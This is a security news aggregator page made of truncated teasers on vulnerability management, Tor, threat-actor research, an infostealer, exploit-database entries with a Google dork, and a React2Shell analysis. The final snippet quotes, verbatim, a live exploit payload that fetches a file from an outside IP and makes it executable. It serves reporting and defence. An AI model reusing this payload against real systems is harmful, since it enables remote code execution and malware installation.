Hacking

ISC Stormcast For Wednesday, December 17th, 2025 https://isc.sans.edu/podcastdetail/9742, (Wed, Dec 17th) Source link

Key Takeaways Cisco is ending support for it vuln management product (formerly Kenna Security) by June 2028 Risk-based vulnerability management (RBVM) used to be adequate, but is no longer sufficient Exposure assessment platforms allow you to assess risks from all organizational risk surfaces  SOC centralizes post‑attack response, the ROC centralizes pre‑attack exposure management Build your…

In our ongoing fight for internet freedom, it’s important to remember who we’re fighting for. That’s why in this blog post, we’re highlighting a story submitted by a Tor user and how Tor helps them circumvent government censorship. Ramon* is a Tor user living in Cuba who faces challenges accessing information from blocked websites, grapples…

Tor Browser 16.0a1 is now available from the Tor Browser download page and also from our distribution directory. This is the first Tor Browser Alpha release based on Firefox Rapid Release: read more about this important change in The Future of Tor Browser Alpha. This version includes important security updates to Firefox. Send us your…

Key Findings In recent months, Check Point Research has identified a new wave of attacks attributed to the Chinese threat actor Ink Dragon. Ink Dragon overlaps with threat clusters publicly reported as Earth Alux, Jewelbug, REF7707, CL-STA-0049, among others. Ink Dragon has expanded its operational focus to new regions – In the last few months, the threat actor’s activities show increased focus on…

# Exploit Title: esm-dev 136 – Path Traversal # Date: 2025-07-11 # Exploit Author: Byte Reaper #Vendor Homepage: https://github.com/esm-dev/esm.sh # Software Link: https://github.com/esm-dev/esm.sh # CVE-2025-59342 – File : exploit.c – Date : 09/17/2025 – Target : esm-dev – Version: 136 – Target Endpoint : /transform – Target Header : X-Zone-Id – Vuln : …

# Exploit Title: Summar Employee Portal 3.98.0 – Authenticated SQL Injection # Google Dork: inurl:”/MemberPages/quienesquien.aspx” # Date: 09/22/2025 # Exploit Author: Peter Gabaldon – https://pgj11.com/ # Vendor Homepage: https://www.summar.es/ # Software Link: https://www.summar.es/software-recursos-humanos/ # Version: < 3.98.0 # Tested on: Kali # CVE: CVE-2025-40677 # Description: SQL injection vulnerability in Summar Software´s Portal del Empleado….

ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740, (Tue, Dec 16th) Source link

Summary Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The…

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{\”then\”:\”$B1337\”}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0″ ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To make…